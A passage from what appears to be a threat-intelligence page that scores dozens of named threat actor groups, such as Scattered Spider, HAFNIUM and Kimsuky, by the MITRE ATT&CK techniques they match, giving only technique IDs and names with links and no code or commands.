  • T1558 - Steal or Forge Kerberos Tickets
  • T1059.011 - Lua
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1159 - Launch Agent
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
  • T1547.008 - LSASS Driver
Link to MITRE →

Scattered Spider

Score: 65.69
Matched TTPs:
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1566.002 - Spearphishing Link
  • T1583.001 - Domains
  • T1547.005 - Security Support Provider
  • T1019 - System Firmware
  • T1590.006 - Network Security Appliances
  • T1045 - Software Packing
  • T1136.002 - Domain Account
  • T1219.001 - IDE Tunneling
  • T1051 - Shared Webroot
  • T1552.003 - Shell History
  • T1218.005 - Mshta
  • T1619 - Cloud Storage Object Discovery
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1090.004 - Domain Fronting
  • T1564.003 - Hidden Window
  • T1565.002 - Transmitted Data Manipulation
  • T1134 - Access Token Manipulation
  • T1027.002 - Software Packing
  • T1547.013 - XDG Autostart Entries
  • T1548.006 - TCC Manipulation
Link to MITRE →

Storm-0501

Score: 31.06
Matched TTPs:
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1140 - Deobfuscate/Decode Files or Information
  • T1574.008 - Path Interception by Search Order Hijacking
  • T1552.003 - Shell History
  • T1218.005 - Mshta
  • T1497.002 - User Activity Based Checks
  • T1097 - Pass the Ticket
  • T1027 - Obfuscated Files or Information
  • T1027.014 - Polymorphic Code
  • T1090.004 - Domain Fronting
  • T1565.002 - Transmitted Data Manipulation
Link to MITRE →

Silent Librarian

Score: 11.32
Matched TTPs:
  • T1566.002 - Spearphishing Link
  • T1027.016 - Junk Code Insertion
  • T1584.005 - Botnet
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
Link to MITRE →

Chimera

Score: 33.49
Matched TTPs:
  • T1089 - Disabling Security Tools
  • T1003.007 - Proc Filesystem
  • T1027.016 - Junk Code Insertion
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1574 - Hijack Execution Flow
  • T1059.003 - Windows Command Shell
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
  • T1548.006 - TCC Manipulation
  • T1027.007 - Dynamic API Resolution
Link to MITRE →

Cinnamon Tempest

Score: 17.11
Matched TTPs:
  • T1089 - Disabling Security Tools
  • T1059.010 - AutoHotKey & AutoIT
  • T1140 - Deobfuscate/Decode Files or Information
  • T1574.008 - Path Interception by Search Order Hijacking
  • T1045 - Software Packing
  • T1552.003 - Shell History
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1547.013 - XDG Autostart Entries
Link to MITRE →

Velvet Ant

Score: 22.53
Matched TTPs:
  • T1089 - Disabling Security Tools
  • T1036.009 - Break Process Trees
  • T1684 - Social Engineering
  • T1009 - Binary Padding
  • T1219.001 - IDE Tunneling
  • T1597 - Search Closed Sources
  • T1027.007 - Dynamic API Resolution
  • T1569.002 - Service Execution
  • T1566.003 - Spearphishing via Service
Link to MITRE →

Aquatic Panda

Score: 15.52
Matched TTPs:
  • T1089 - Disabling Security Tools
  • T1003.007 - Proc Filesystem
  • T1059.009 - Cloud API
  • T1136.002 - Domain Account
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
Link to MITRE →

APT3

Score: 26.99
Matched TTPs:
  • T1089 - Disabling Security Tools
  • T1562.012 - Disable or Modify Linux Audit System
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1177 - LSASS Driver
  • T1219.001 - IDE Tunneling
  • T1051 - Shared Webroot
  • T1059.008 - Network Device CLI
  • T1497.002 - User Activity Based Checks
  • T1059.011 - Lua
  • T1218.010 - Regsvr32
  • T1134 - Access Token Manipulation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
Link to MITRE →

BackdoorDiplomacy

Score: 13.11
Matched TTPs:
  • T1089 - Disabling Security Tools
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
Link to MITRE →

HAFNIUM

Score: 26.21
Matched TTPs:
  • T1027.008 - Stripped Payloads
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1027.016 - Junk Code Insertion
  • T1590.006 - Network Security Appliances
  • T1175 - Component Object Model and Distributed COM
  • T1219.001 - IDE Tunneling
  • T1049 - System Network Connections Discovery
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1134 - Access Token Manipulation
  • T1547.013 - XDG Autostart Entries
  • T1548.006 - TCC Manipulation
Link to MITRE →

Poseidon Group

Score: 3.32
Matched TTPs:
  • T1003.007 - Proc Filesystem
  • T1497.002 - User Activity Based Checks
Link to MITRE →

APT1

Score: 10.05
Matched TTPs:
  • T1003.007 - Proc Filesystem
  • T1590.006 - Network Security Appliances
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1668 - Exclusive Control
Link to MITRE →

Rocke

Score: 26.42
Matched TTPs:
  • T1036.009 - Break Process Trees
  • T1059.010 - AutoHotKey & AutoIT
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1612 - Build Image on Host
  • T1597 - Search Closed Sources
  • T1059.011 - Lua
  • T1059.013 - Container CLI/API
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
  • T1008 - Fallback Channels
Link to MITRE →

INC Ransom

Score: 21.38
Matched TTPs:
  • T1036.009 - Break Process Trees
  • T1140 - Deobfuscate/Decode Files or Information
  • T1586.002 - Email Accounts
  • T1552.003 - Shell History
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
  • T1027.007 - Dynamic API Resolution
Link to MITRE →

Strider

Score: 11.19
Matched TTPs:
  • T1574.014 - AppDomainManager
  • T1130 - Install Root Certificate
  • T1569.002 - Service Execution
Link to MITRE →

BlackByte

Score: 40.81
Matched TTPs:
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1140 - Deobfuscate/Decode Files or Information
  • T1586.002 - Email Accounts
  • T1684 - Social Engineering
  • T1009 - Binary Padding
  • T1059.009 - Cloud API
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1175 - Component Object Model and Distributed COM
  • T1606.001 - Web Cookies
  • T1134.001 - Token Impersonation/Theft
  • T1497.002 - User Activity Based Checks
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
  • T1027.007 - Dynamic API Resolution
Link to MITRE →

Mustard Tempest

Score: 9.16
Matched TTPs:
  • T1091 - Replication Through Removable Media
  • T1557.003 - DHCP Spoofing
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
Link to MITRE →

Fox Kitten

Score: 32.57
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1177 - LSASS Driver
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1612 - Build Image on Host
  • T1051 - Shared Webroot
  • T1497.002 - User Activity Based Checks
  • T1059.001 - PowerShell
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking
  • T1656 - Impersonation
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
  • T1548.006 - TCC Manipulation
Link to MITRE →

ToddyCat

Score: 9.98
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1219.001 - IDE Tunneling
  • T1497.002 - User Activity Based Checks
  • T1134 - Access Token Manipulation
  • T1547.008 - LSASS Driver
Link to MITRE →

Blue Mockingbird

Score: 16.28
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1059.009 - Cloud API
  • T1045 - Software Packing
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1027.014 - Polymorphic Code
  • T1505 - Server Software Component
  • T1027.007 - Dynamic API Resolution
Link to MITRE →

Volatile Cedar

Score: 8.14
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1002 - Data Compressed
  • T1547.013 - XDG Autostart Entries
Link to MITRE →

DarkVishnya

Score: 8.53
Matched TTPs:
  • T1586.002 - Email Accounts
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1097 - Pass the Ticket
  • T1209 - Time Providers
Link to MITRE →

Carbanak

Score: 9.60
Matched TTPs:
  • T1586.002 - Email Accounts
  • T1009 - Binary Padding
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1547.002 - Authentication Package
Link to MITRE →

Akira

Score: 13.02
Matched TTPs:
  • T1586.002 - Email Accounts
  • T1552.003 - Shell History
  • T1497.002 - User Activity Based Checks
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1134 - Access Token Manipulation
Link to MITRE →

LAPSUS$

Score: 33.16
Matched TTPs:
  • T1547.005 - Security Support Provider
  • T1562.012 - Disable or Modify Linux Audit System
  • T1019 - System Firmware
  • T1045 - Software Packing
  • T1136.002 - Domain Account
  • T1175 - Component Object Model and Distributed COM
  • T1619 - Cloud Storage Object Discovery
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1137.004 - Outlook Home Page
  • T1564.003 - Hidden Window
  • T1548.006 - TCC Manipulation
Link to MITRE →

Lotus Blossom

Score: 15.53
Matched TTPs:
  • T1059.009 - Cloud API
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1199 - Trusted Relationship
  • T1505 - Server Software Component
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1569.002 - Service Execution
Link to MITRE →

Stealth Falcon

Score: 7.94
Matched TTPs:
  • T1562.012 - Disable or Modify Linux Audit System
  • T1590.006 - Network Security Appliances
  • T1497.002 - User Activity Based Checks
  • T1556.009 - Conditional Access Policies
Link to MITRE →

Leafminer

Score: 14.54
Matched TTPs:
  • T1562.012 - Disable or Modify Linux Audit System
  • T1027.016 - Junk Code Insertion
  • T1219.001 - IDE Tunneling
  • T1051 - Shared Webroot
  • T1199 - Trusted Relationship
  • T1059.012 - Hypervisor CLI
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
Link to MITRE →

Deep Panda

Score: 10.14
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1177 - LSASS Driver
  • T1497.002 - User Activity Based Checks
  • T1027.014 - Polymorphic Code
  • T1134 - Access Token Manipulation
Link to MITRE →

FIN5

Score: 9.09
Matched TTPs:
  • T1547.011 - Plist Modification
  • T1199 - Trusted Relationship
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking
  • T1134 - Access Token Manipulation
Link to MITRE →

CopyKittens

Score: 3.99
Matched TTPs:
  • T1045 - Software Packing
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
Link to MITRE →

Windigo

Score: 8.15
Matched TTPs:
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1059.012 - Hypervisor CLI
  • T1159 - Launch Agent
Link to MITRE →

POLONIUM

Score: 9.02
Matched TTPs:
  • T1045 - Software Packing
  • T1608.005 - Link Target
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1547.002 - Authentication Package
Link to MITRE →

Metador

Score: 4.08
Matched TTPs:
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1547.013 - XDG Autostart Entries
Link to MITRE →

APT18

Score: 3.50
Matched TTPs:
  • T1219.001 - IDE Tunneling
  • T1157 - Dylib Hijacking
  • T1547.013 - XDG Autostart Entries
Link to MITRE →

Water Galura

Score: 4.86
Matched TTPs:
  • T1552.003 - Shell History
  • T1027 - Obfuscated Files or Information
Link to MITRE →

SilverTerrier

Score: 6.14
Matched TTPs:
  • T1552.003 - Shell History
  • T1041 - Exfiltration Over C2 Channel
Link to MITRE →

APT17

Score: 5.45
Matched TTPs:
  • T1608.005 - Link Target
  • T1656 - Impersonation
Link to MITRE →

TA578

Score: 3.37
Matched TTPs:
  • T1608.005 - Link Target
  • T1027.018 - Invisible Unicode
Link to MITRE →

Thrip

Score: 4.58
Matched TTPs:
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1565.002 - Transmitted Data Manipulation
Link to MITRE →

FIN10

Score: 3.07
Matched TTPs:
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
Link to MITRE →

Suckfly

Score: 3.19
Matched TTPs:
  • T1157 - Dylib Hijacking
  • T1209 - Time Providers
Link to MITRE →

Equation

Score: 4.13
Matched TTPs:
  • T1130 - Install Root Certificate
Link to MITRE →

Threat actors related to this Pulse (inference-based)

Kimsuky

Score: 0.70
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1606.002 - SAML Tokens
  • T1027.014 - Polymorphic Code
  • T1051 - Shared Webroot
  • T1009 - Binary Padding
  • T1597 - Search Closed Sources
  • T1199 - Trusted Relationship
  • T1547.002 - Authentication Package
  • T1497.002 - User Activity Based Checks
  • T1608.005 - Link Target
  • T1037 - Boot or Logon Initialization Scripts
  • T1219.001 - IDE Tunneling
  • T1140 - Deobfuscate/Decode Files or Information
  • T1041 - Exfiltration Over C2 Channel
  • T1003.003 - NTDS
  • T1684 - Social Engineering
  • T1003.007 - Proc Filesystem
  • T1562.012 - Disable or Modify Linux Audit System
  • T1552.003 - Shell History
  • T1608 - Stage Capabilities
  • T1059.010 - AutoHotKey & AutoIT
  • T1566.002 - Spearphishing Link
  • T1668 - Exclusive Control
  • T1218.012 - Verclsid
  • T1059.009 - Cloud API
  • T1027.018 - Invisible Unicode
  • T1656 - Impersonation
  • T1205 - Traffic Signaling
  • T1091 - Replication Through Removable Media
  • T1590.006 - Network Security Appliances
  • T1547.013 - XDG Autostart Entries
  • T1059.011 - Lua
  • T1690 - Prevent Command History Logging
  • T1008 - Fallback Channels
  • T1027.010 - Command Obfuscation
  • T1087.002 - Domain Account
  • T1156 - Malicious Shell Modification
  • T1555.003 - Credentials from Web Browsers
  • T1565.002 - Transmitted Data Manipulation
  • T1055.014 - VDSO Hijacking
  • T1557.003 - DHCP Spoofing
Link to MITRE →

Related CVEs

No CVEs were found for this Pulse.

Pulse – Threat Actor Graph